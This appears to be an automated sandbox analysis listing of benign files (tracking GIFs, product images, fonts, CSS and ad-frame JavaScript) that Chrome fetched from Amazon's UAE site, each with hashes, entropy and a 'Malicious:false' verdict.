                                                                                                                                                                                                        SHA-256:7139C8036B9CC7C705490E77FA7313F15A35B44D207B410750BFA81B583FF8B5
                                                                                                                                                                                                        SHA-512:27B8287B5619E388F0DF3E4C67404E01F6231B5905FFD12F54A9B91AEA073833C313D93AC9132F6B85901AD24E11FE69F551891842EBDFEC0B239319DAC32327
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........d.."...............................................................!...1Aa"2Qq.....#R.....$3BCst.....br....DScd......................................................!.1."AQ.2a..q...#B...............?..J...+.G.....2G;T1.c..s[P.H.8.?_.... ...9..x....{.,|7....e........>8O.V....fQ...xU...........m.s*.B<..W.#.A...8.......4#..y.{......l{#....kV([.......i......8.~...^.d.S.Wh].S.61..o...*............q....zq...)L.SK.YG.j...S..4Q...:.Dm.........Kw^.i+E..". w....._......Z[t.S.0.....#s.n.....-......32..).......!.4=q..u..P...G.h.@O...>z.c...2...2.t.W.=c.d.......}...Ft%..yN........}..J.....~Z.W......Z9.7.-.5.X0...........A..<..,..O..e#'$.....#..R.Gw.....r~...@4..c..pu...&v0m...........i.}d....?w......Q....fgJ..at.....b..y.x...e.[E.X<[.|......n.AG .a.t..es.V!.%.........../N.MJ"..ya..0C............S.@.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6967%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 266x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15124
                                                                                                                                                                                                        Entropy (8bit):7.9561130161560705
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:ZV7TTXUNEu5RoyUh92CGMsm2mGrTg5Poano0cXhSPHRWkUi5:Z1TY+ujoyG4CGe5Pro0cA/RWM5
                                                                                                                                                                                                        MD5:606B4943BDEC9CFFC874C2079FAF3FA5
                                                                                                                                                                                                        SHA1:978B346B71C0697AC4DF41B5870E0D535AC7170D
                                                                                                                                                                                                        SHA-256:B26ABF349E41A7D051D791720672935473B5912C7B252D6027EE3249E01E7011
                                                                                                                                                                                                        SHA-512:1FD9EE1CBCDB6833E03BD3A8AE0D827F698FBCFF65D356197997C6E6769137E227ED3501EED1E551757C1424C8102E4522C1C39C1569A426C4537502F15469D3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71NAHqFhGML._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................6n4;..x.wYi....C...+6;..y.OM.#...}.sW.J6................ba..:0...-..Jv....\..Z..i.a.f2.q.sO....IY.......ej.^G]...2...2q..y......94XP.nDd.=9.4.U..{k,Z.3\..0K...hF)fq.1h.......P.O.+.l.5....G.il..b.X..L....C.....gV.F..+....'6.K.....o....._..!B.s-.b.....$V.=...rM.uL..9[.....l.i.!/.Y..P.H...`C..F..9..7#...F0...7.g.Y0.....g-..Kk..`....(w..4.7........i.Q......;.a`..5U..i...,.D..J..y.<WIWW.BW"..@.)....8\.pd...':...X..`....Bj.Q6.-......z+.8..Jlz........6\.#....`Cyo...i..KO@...#.....k....>A......#RVj........Kb=.d...BV.O............VZ_..a.s.$....|....<.f....=nN.....}....n....>'E..&.....j'c&.T.C..Lz.m....Zl..3E....].|*...h..A...:.E............Y.7}i?39K..(.(.`.)h}....bg.7P.!.....W.Z.Y>n.K.Y.....y4'@y...cs..\2[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D127%26pc%3D5786%26at%3D5786%26t%3D1723729113766%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):92658
                                                                                                                                                                                                        Entropy (8bit):7.948149613967599
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:fnAvuuA3l5o0u3Zp0wTMmcAyjL5s8POxnyx+3N7i3/kdmV/sq2apnNfweqZz6wr7:fkRMW0+klmEjL5fP4yxCNA/Ywsq2dZmG
                                                                                                                                                                                                        MD5:744586DF892472843C31E081882DDB1B
                                                                                                                                                                                                        SHA1:4A5E84553974BD7A43A63F99509FEE1EEF59DA20
                                                                                                                                                                                                        SHA-256:18E50E9F054AB004A35C6FA0EA46C440D0DF1C6A1C3152262D3CF43B814DBFA5
                                                                                                                                                                                                        SHA-512:E0FC2159EADA064F4E79326DD574B791BDE588CDC04AD02849F962C73D737A9C532CA933235197B238140604E9BFE4EC70C6EA349B5603DA0F29F11848F9F2C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......7.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:448DAF084B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:448DAF094B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13E74B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E84B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............i:......i............................................................##########................#############
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18121), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18121
                                                                                                                                                                                                        Entropy (8bit):5.2667350205862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Qohgc8TpIDc8Vjm/x9UjL8s2IE/7Al2muXSjxxo7r74QMAV83OKHeC3WtfagdFZM:5Gdn/UuXSjo7rsQ8eCx4x+
                                                                                                                                                                                                        MD5:5EA6CF08DBDCE6C1620779C1E86B0A73
                                                                                                                                                                                                        SHA1:B06AF5A2E3F391670409C94E9F76EEDEF084A3C0
                                                                                                                                                                                                        SHA-256:CE15CD0773F77B66CC95DE5C483D3E3F72C0CBC00854621C1FCBB0FC5A31A98D
                                                                                                                                                                                                        SHA-512:83E67E3B5907FD81DAE9E93F9C33EE3DE3D131EB569B7C1DB4BB70510F69F2EAB42800DCD6CEDE866EAB733C8DA3289319351B16D28608FA16730F817DE38710
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd
                                                                                                                                                                                                        Preview:@charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/S/sash/sHjosC8mtVdCbEZ.gif) no-repeat;display:inline-block;vertical-align:top;width:900px;height:3px}.gw-icon{background-size:132px 235px}#pageContent{background:#E3E6E6;margin:0 auto;max-width:none;min-width:1000px;overflow:hidden}#gw-content-grid hr{height:20px;border:none;margin:0}#gw-layout{padding:0 10px 0}#gw-card-layout{max-width:1480px;margin:0 auto;overflow:hidden;padding:20px 0}#gw-card-layout>.gw-col{max-width:400px}#gw-card-layout>.gw-col[data-col-span-ws="2"]{max-width:none}#gw-card-layout>.gw-col[data-col-span-sm="2"]{max-width:none}#gw-card-layout hr{border:none;margin:0}.gw-card-layout[data-flow-dir="h"]>.gw-col{height:420px}#main-content{margin:0 10px}#gw-content-grid{max-width:1480px;margin:0 auto}#gw-content-grid hr:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1494
                                                                                                                                                                                                        Entropy (8bit):7.491314812588649
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TRe+0CmRoR1v2Do6fMDKPmQnrKi3Sa7HpRA4VhPUB676vlZWlx/pg4qu7+cSr+Ok:TT0rogo6fM+1rKiiiJ64VxUJvWjpg4nX
                                                                                                                                                                                                        MD5:5A672574F8EB20918FFBCAC3548DCB2E
                                                                                                                                                                                                        SHA1:0CE81554FD0520BF8966D31E3C358F7D964CA1E2
                                                                                                                                                                                                        SHA-256:7ABC64236E3A1539675B3E2E300FF8C360E50313D8995C7B4432B86B53F740E6
                                                                                                                                                                                                        SHA-512:5A4F1F94E77CAF0FD0D1580ACBE32C1692A1AC210F155BEADA502861475A0A6AAD0F75C8B1861AE338878939BCD9948ECA18B5B56342A16A802AE6BFE8F34B9A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1Q."2Aaq.....3r...#R...4................................................12............?..........................h...Qo.....1.h....s.w.........^kp.URuv.qMC<.M.q..X&...1]).K=...i2h..9;o)i[.[..U.b.....:.TUR.y@H........I..j.P..h.......w.IJO..8..Q.....r.87.Q.....Y6v...Fz./.Q.(..O.....\....D.......JR.n=.I...}...=6.75..#..Cj..,p.,vF.6..\..N.....:6...F.4..tw*u{.}$.t.YB..B.*t...X...._.M.....\-g.UN-oY.I...-.q.cN.oVpm.\.E..8..Ao}..c$.?......<..B....,h.,7...NO9......#......kR.;wXk..b.. ..If<...%@......^[m.....l.2......z.9[..q...S.6..f...ire.-];..Q......k...5.e..vH..e..L..._. .....2...V.(.P.5;J+.Y......QeuuV.j7..5.=.T..*m..8.x....ye....V..1N...9....\...$O+.k.N.8....:^....(..W..p....f..d..#%.SD..i8.3!y*\O.......T....GJ...u.n...I..l
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (42564)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):42614
                                                                                                                                                                                                        Entropy (8bit):5.343120598013134
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:kzZ6QexaNOF3QrJ9FL0PD+MtOxKjizJRiaLaeW0VofOCMpqfVO0aU3APeKRlqMir:kPe4O1RPD+k8W0E4qo0yeY/iDogyZS
                                                                                                                                                                                                        MD5:F467A8043189BE8253E63864BECDFEC1
                                                                                                                                                                                                        SHA1:657D4F54B62346FC45765E9DDF558AAD95C40368
                                                                                                                                                                                                        SHA-256:2DFA2C991A88BCFA1052671A06FB6F2619637CCB5FB3A7345FF97E5DF244E592
                                                                                                                                                                                                        SHA-512:6303642D244EC687CA1C6667359AEC5D3DEE5A225C14A8A5CDEE630A14424EBD0116CE2F023CDA46EE3122EC9485D21741AA4A4AD3A93A51C554641AE0ABCCEF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame
                                                                                                                                                                                                        Preview:(()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result from the feedback service was not ok ${this.urlPathAndParameter}`);e.updateElement(this.getHtmlId(),a)}getHtmlId(){return e(this.parentHtmlId)}isHidden(){return this.hidden}exists(e){return e.exists(this.getHtmlId())}constructor(e,t,a,n,i,r,s){this.parentHtmlId=e,this.feedbackStyle=t,this.labelText=a,this.labelStyle=n,this.position=i,this.urlPathAndParameter=r,this.hidden=s}}class a{open(e){e.clickChildLink(this)}getHtmlId(){return e(this.parentHtmlId)}constructor(e){this.parentHtmlId=e}}var n=function(e){console.debug(e)},i=function(e,t){console.error(e),r("ERROR",e,s(e,t))},r=function(e,t,a){var n;null===(n=window.ueLogError)||void 0===n||n.call(window,a,{logLevel:e,attribution:"APE-safeframe",message:t+" | "})},s=function(e,t){return
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):76642
                                                                                                                                                                                                        Entropy (8bit):4.91804869468611
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:LyNsNwNAN/WSiHNXNW+NaNs5NmNcWNBNCINoNGtN0NYjN1Nqm:8k
                                                                                                                                                                                                        MD5:8982FAB302BFD0574496A6C5EC6EAF0F
                                                                                                                                                                                                        SHA1:86B1E78927CC030C7688AF418B5A895A8F73D2CD
                                                                                                                                                                                                        SHA-256:7CD66B055116D24C67CFA9B0C2BF97ADAD9F0CD3985D8411A3702692DA7B2576
                                                                                                                                                                                                        SHA-512:E1491B341E331F6E97690474C81F618D8FE0E4C3A8DEC18619AC94AA3B05330ACBAF2380F14651ACC9FE2E5F5782A4F257945BD7F7F11CE7DE858EB48FEE7577
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/61wm2WQpqYL.css?AUIClients/ACSWidgetAssets-contentGrid
                                                                                                                                                                                                        Preview:.bxc-grid__container{margin-left:auto;margin-right:auto}.bxc-grid__container.bxc-grid__container--width-770{max-width:770px}.bxc-grid__container.bxc-grid__container--width-771{max-width:771px}.bxc-grid__container.bxc-grid__container--width-768{max-width:768px}.bxc-grid__container.bxc-grid__container--width-960{max-width:960px}.bxc-grid__container.bxc-grid__container--width-1024{max-width:1024px}.bxc-grid__container.bxc-grid__container--width-1170{max-width:1170px}.bxc-grid__container.bxc-grid__container--width-1280{max-width:1280px}.bxc-grid__container.bxc-grid__container--width-1366{max-width:1366px}.bxc-grid__container.bxc-grid__container--width-1500{max-width:1500px}.bxc-grid__container.bxc-grid__container--width-full{max-width:100%}.bxc-grid__l-gutter-layout .bxc-grid__row{margin-left:-24px}.bxc-grid__l-gutter-layout .bxc-grid__column{position:relative;box-sizing:border-box;display:inline-block;margin-right:-.3em;vertical-align:top;min-height:1px;padding-left:24px}.bxc-grid__l-gutt
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 16460, version 1.655
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16460
                                                                                                                                                                                                        Entropy (8bit):7.987708256804987
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:pvO6xEw4Jj9HYfGbtieHqP0l4S7NVXfU3xqJvzJmPnC1LiTNNIb0QAZtcnlclz0n:bWzHqP7S7Na3SJmKNyElcUuMXqGN3v
                                                                                                                                                                                                        MD5:15E17F26C664EE0518F82972282E6FF3
                                                                                                                                                                                                        SHA1:46B91BDA68161C14E554A779643EF4957431987B
                                                                                                                                                                                                        SHA-256:4065B43BA3DB8DA5390BA0708555889F78E86483FE0226EF79EA22D07C306B89
                                                                                                                                                                                                        SHA-512:54EADB53589C5386A724C8EEA2603481EBB23E7062FD7BFAB0EAFE55C9E1344F96320259412FB0DC7A6F5B6E09B32F6907F9AAA66BCA5812D45157E3771C902F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/KFPk-9IF4FqAqY-.woff2
                                                                                                                                                                                                        Preview:wOF2......@L..........?.........................?FFTM..8..j..@.`..~.....h..i.6.$..F..<.. .....a?webf..}...6..........n.......fE.q. ..Y...9.2d.$.}[..0.H....j.k....U..#"-SM.t..."D....+....t.8f...s...g636|..g._.....EB.T.!.B..!..y...k....Ya..G~.Y.;+....)...k...=it.........k_.^.z.#.).).....Y?....}..&N.s....1..=A.FXSG...`C...00..5*l..#6...w....-...hkJ. .-...$D..1j..F.]..ny^..]..:.\...2......^n...5P......_.6..k..2..K..i......y....K...?..6...*q>.. .....a9...........4/.c.E.........q...8N..$.$....z.?.d..v.QmY..D....s...:Y...S.|..|...[..@...4...V..n..s....t....A....\.v..X...M..O4.!=$..35m1\..wT"..w.c.s(...]t.?....."Q....1(.p..%0<-v..b.^R.)E:$..0<.....R.B.TY...K..n\..{#...kd.-.8..#.........t;..3.....IT[..2.L...........H..$..._.j.....b<B..uN.,*....k....@.k.k.....[.........6....U.1bDDD..Qu....R..+a......^.iS..qb.^..U.uU.sj..-<D....H..Y.J..[......8....V}........}.$^...CE..jc. d`.^..q..Nw.....`...1...S19.u....`H..WT.1.....y...c.A..op`..V..I....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):39385
                                                                                                                                                                                                        Entropy (8bit):7.948506994397826
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:8gLMZaPZ2SRcZakX05s/uZI4UzMjuqu2LN1EY0BX93cBdmfjuV:PZjrkX0+/uVfu2XqBX9sHmf0
                                                                                                                                                                                                        MD5:C7F67E9EE30FC682775AF02FC3FE1967
                                                                                                                                                                                                        SHA1:C70BDB7CB310C46B0EE8C7E66BA79633BF34D3A4
                                                                                                                                                                                                        SHA-256:FB362B603C9FF81C9E9C43D107E55E7DA11CF9F0EFA04BE9C804AFD1AD6B428A
                                                                                                                                                                                                        SHA-512:02D38553B7FB3EEAAA5C36133A9336C1339337C8BD728D64340F0A3B3D6886E7A91D618D66DA10FB79F8AC4BCB692E375363DB0B71BEF2DE518BD037BD258C8C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................:................................................................................`.-0....Yo.......u....u..._.c...f.U?p...?................=..-...Cc...xF@.......?\.f..IC.k...Z..@............j....hc.|N................s..I.=P........i......f."Hy|6..........fV+......@........Z..&..6ee .;..........U.....h..v.2.........M.a.lJ.............v.....O...M.@......C.r...T...P......t....T......;.x...~.y..8].. ......y..%.6.........f^....<.fMj...|7Mtn...].....p`..|..vSr?........-...9.r8.......1..C...7?............v....7U.NN...NK.;.@.x..9^......[.Y.V..\...P......}=...._.F..:.n..R.3.i.s........'..W..D.>.R..4...).......ddy.7..Wp......Q.7..~..'..)..(..3.i.y.nQ.7.T.>[5>A.....&..B.}..0..k..3...4.Ng ......?..7..~k..l.9..p.MG..e..^M..)..-.. ....S...&>..m.n0......y.'................A.6N...S......).....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):50082
                                                                                                                                                                                                        Entropy (8bit):7.987807532763977
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:5wWpUEXgzwFMHy8pQbzCUDtGJLFJLNshqGvdqpIFkgB8H2C0M5i77n7mCjm:5fDXEIrbzpDtGJLHLaLqoS2CWn7Hm
                                                                                                                                                                                                        MD5:3EAB8728FAA8C817C53784EAEB159B45
                                                                                                                                                                                                        SHA1:9DAFCA9539450E270242A0524311D6FCD463C420
                                                                                                                                                                                                        SHA-256:91617305D0E69D772BB6A8AED058DE9F3E5D6F57B56D2D23D7612BF9976A7B3C
                                                                                                                                                                                                        SHA-512:3120D6A8B53C6D6E74974D883C6DEC9DDF1FD0E59631934DCC119EF16AFC3BC85EDEDA1BEAAA4F707A97DC6C51374740DCAAA105067BBBE97E4C0A9789D32D1B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_03_electronics_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..T..R....................U..S..............Q..V........P........O......-,1...0/4+*/!-<.....M438216#"(..N%$*...&%+...65:('-.-398=..V)(......L..Y....)8...#/>........Q.. .%<;?...%1@..!.....*'3A../...'&'..M+**.$4(5D......$##.....%...$0?..!0//............A@C........T......................444....................GFG......987gghkkl.....aqqr...]]_bbdxxy...TTU;GT...............LLM[doYYZ......(?Q............:Hc_F...goz.....XUB..^:F.NJ:BS...>QPQ...GR^n..CA6.....6@N...QZg...uqSJU.z..igP..l....=.............&..~Wd.px............t....!..._u.".M8E=v..-...X[@N...X]. .z...')...;LQ.zPd..L..KK..??.&/[0.r.99iFW?b...g..[8Rh.DA.....T62)|yZix..d..VpjH.1/06r.......QS........eaj.......).R^^..PO79.."#..W...c.lV.....x.v.01.%...B@..`.NP}...~!..m..'}.~..N8..d.+..Li.h...... .IDATx..M..g..%.MDw.F.t..WfZ.c.=N.{X......%_aO...g...e/._.....[...........|..^.zZ=.&.=d...$'.._....<...?.....>=...>._.Gk...F..e....k..`.]....p...Y...........].7M.ei...HW.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
